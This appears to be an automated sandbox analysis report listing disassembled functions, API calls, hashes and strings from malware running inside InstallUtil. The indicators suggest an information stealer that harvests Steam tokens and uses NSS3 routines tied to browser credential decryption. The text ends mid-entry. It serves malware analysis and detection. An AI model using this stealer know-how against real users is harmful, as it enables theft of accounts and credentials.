                                                                                                                  • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                  • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                  • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                  • API String ID: 502913869-3507145866
                                                                                                                  • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                  • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                  • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                  • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                  APIs
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocLocal
                                                                                                                  • String ID: 1iA
                                                                                                                  • API String ID: 3494564517-1863120733
                                                                                                                  • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                  • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                  • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                  • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409209
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409224
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2500673778-0
                                                                                                                  • Opcode ID: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                                                  • Instruction ID: 27ee426b6b58d638c78c42283a2d386f26495828f80e9e64967a6f8c5e3c9e1b
                                                                                                                  • Opcode Fuzzy Hash: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                                                  • Instruction Fuzzy Hash: 49513D71A00119ABCF01FFA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                  • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                  • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                  • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 0041CBC9
                                                                                                                    • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                    • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                    • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                  • malloc.MSVCRT ref: 0041CC06
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc$lstrcpylstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2974738957-0
                                                                                                                  APIs
                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1699248803-0
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  APIs
                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FileOperation
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3080627654-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                  • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                  • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                  • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C79601B,?,00000000,?), ref: 6C7B486F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7B48A8
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7B48BE
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7B48DE
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7B48F5
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C7B490A
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C7B4919
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C7B493F
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4970
                                                                                                                  • PORT_Alloc_Util.NSS3(00000001), ref: 6C7B49A0
                                                                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7B49AD
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B49D4
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7B49F4
                                                                                                                  • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C7B4A10
                                                                                                                  • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C7B4A27
                                                                                                                  • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C7B4A3D
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C7B4A4F
                                                                                                                  • PL_strcasecmp.NSS3(00000000,every), ref: 6C7B4A6C
                                                                                                                  • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C7B4A81
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4AAB
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7B4ABE
                                                                                                                  • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C7B4ADC
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4B17
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7B4B33
                                                                                                                    • Part of subcall function 6C7B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B413D
                                                                                                                    • Part of subcall function 6C7B4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B4162
                                                                                                                    • Part of subcall function 6C7B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B416B
                                                                                                                    • Part of subcall function 6C7B4120: PL_strncasecmp.NSS3(2B{l,?,00000001), ref: 6C7B4187
                                                                                                                    • Part of subcall function 6C7B4120: NSSUTIL_ArgSkipParameter.NSS3(2B{l), ref: 6C7B41A0
                                                                                                                    • Part of subcall function 6C7B4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B41B4
                                                                                                                    • Part of subcall function 6C7B4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7B41CC
                                                                                                                    • Part of subcall function 6C7B4120: NSSUTIL_ArgFetchValue.NSS3(2B{l,?), ref: 6C7B4203
                                                                                                                  • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C7B4B53
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4B94
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4BA7
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4BB7
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4BC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                  • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                  • API String ID: 3791087267-1256704202
                                                                                                                  • Opcode ID: 1070ab33cbb80d26fe5e63843d9e1c745231fff47745cf7702d3def955d20a61
                                                                                                                  • Instruction ID: 8eff326972254284a758637e6eb86899d59c299123c7b7e03401611a3c3a95eb
                                                                                                                  • Opcode Fuzzy Hash: 1070ab33cbb80d26fe5e63843d9e1c745231fff47745cf7702d3def955d20a61
                                                                                                                  • Instruction Fuzzy Hash: 45C115B0E452559BEB108FA89E44BAF7BB8AF06248F140438E995B7B01E7319914D7A1
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C79A670
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C79A67E
                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C79A69B
                                                                                                                    • Part of subcall function 6C779520: PK11_IsLoggedIn.NSS3(00000000,?,6C7A379E,?,00000001,?), ref: 6C779542
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A6C0
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79A703
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79A718
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79A78B
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000104,?,00000000), ref: 6C79A7DD
                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C79A7FA
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C79A818
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79A82F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A868
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C79A873
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79A884
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C79A894
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C79A8D9
                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,00000000,00000000,00000000), ref: 6C79A8F0
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8B0B04), ref: 6C79A93F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A952
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C79A961
                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001), ref: 6C79A96E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Item_$Zfree$Arena_Free$Alloc_ArenaContext$AuthenticateBlockCipherCreateCriticalDestroyEncodeEnterInitInternalLockLoggedPoolSectionSizeSlotUnlockValuecallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1441238854-0
                                                                                                                  • Opcode ID: 31c0384a3b805dce0d82770dac3448a86b7d9b4429161ec344cd8822e03de113
                                                                                                                  • Instruction ID: f42e27352995c31df65a37b55f3595b7b2d8f5fc414a71c64655ffa2e6544e1f
                                                                                                                  • Opcode Fuzzy Hash: 31c0384a3b805dce0d82770dac3448a86b7d9b4429161ec344cd8822e03de113
                                                                                                                  • Instruction Fuzzy Hash: DD91F7B1E012089FEB01DFA5EE49AAEB7B8EF1531CF144535E814AB701F7719909C791
                                                                                                                  APIs
                                                                                                                  • PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C7805E3
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78060C
                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C78061A
                                                                                                                  • PK11_PubDeriveWithKDF.NSS3 ref: 6C780712
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C780740
                                                                                                                  • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C780760
                                                                                                                  • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7807AE
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C7807BC
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C7807D1
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7807DD
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7807EB
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C7807F8
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C78082F
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C7808A9
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C7808D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 657680294-0
                                                                                                                  • Opcode ID: 7300a998137b0057d0373d56cbdeecea906fc84d01833b991823e28b6c44db6c
                                                                                                                  • Instruction ID: 9dba0b96f0cda3da8fbeb69bfd2f98ae3291f4b80d0b62dca71698b5265806ba
                                                                                                                  • Opcode Fuzzy Hash: 7300a998137b0057d0373d56cbdeecea906fc84d01833b991823e28b6c44db6c
                                                                                                                  • Instruction Fuzzy Hash: 0491C371A063409BEB10CF25DE48B5B77E1EF84318F148A3CEA9987791EB31D954CB92
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF0AE
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF0C8
                                                                                                                  • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7BF101
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF11D
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C88218C), ref: 6C7BF183
                                                                                                                  • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7BF19A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BF1CB
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7BF1EF
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7BF210
                                                                                                                    • Part of subcall function 6C7652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7BF1E9,?,00000000,?,?), ref: 6C7652F5
                                                                                                                    • Part of subcall function 6C7652D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C76530F
                                                                                                                    • Part of subcall function 6C7652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C765326
                                                                                                                    • Part of subcall function 6C7652D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7BF1E9,?,00000000,?,?), ref: 6C765340
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BF227
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7BF23E
                                                                                                                    • Part of subcall function 6C7ABE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C75E708,00000000,00000000,00000004,00000000), ref: 6C7ABE6A
                                                                                                                    • Part of subcall function 6C7ABE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7604DC,?), ref: 6C7ABE7E
                                                                                                                    • Part of subcall function 6C7ABE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7ABEC2
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7BF2BB
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7BF3A8
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7BF3B3
                                                                                                                    • Part of subcall function 6C762D20: PK11_DestroyObject.NSS3(?,?), ref: 6C762D3C
                                                                                                                    • Part of subcall function 6C762D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C762D5F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1559028977-0
                                                                                                                  APIs
                                                                                                                  • PK11_PubDeriveWithKDF.NSS3 ref: 6C780F8D
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C780FB3
                                                                                                                  • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C781006
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C78101C
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C781033
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78103F
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C781048
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C78108E
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7810BB
                                                                                                                  • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7810D6
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C78112E
                                                                                                                    • Part of subcall function 6C781570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7808C4,?,?), ref: 6C7815B8
                                                                                                                    • Part of subcall function 6C781570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7808C4,?,?), ref: 6C7815C1
                                                                                                                    • Part of subcall function 6C781570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78162E
                                                                                                                    • Part of subcall function 6C781570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C781637
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1510409361-0
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C3F
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C60
                                                                                                                  • PR_ExplodeTime.NSS3(00000000,6C751C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                  • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                  • API String ID: 3534712800-180463219
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C821027
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8210B2
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C821353
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
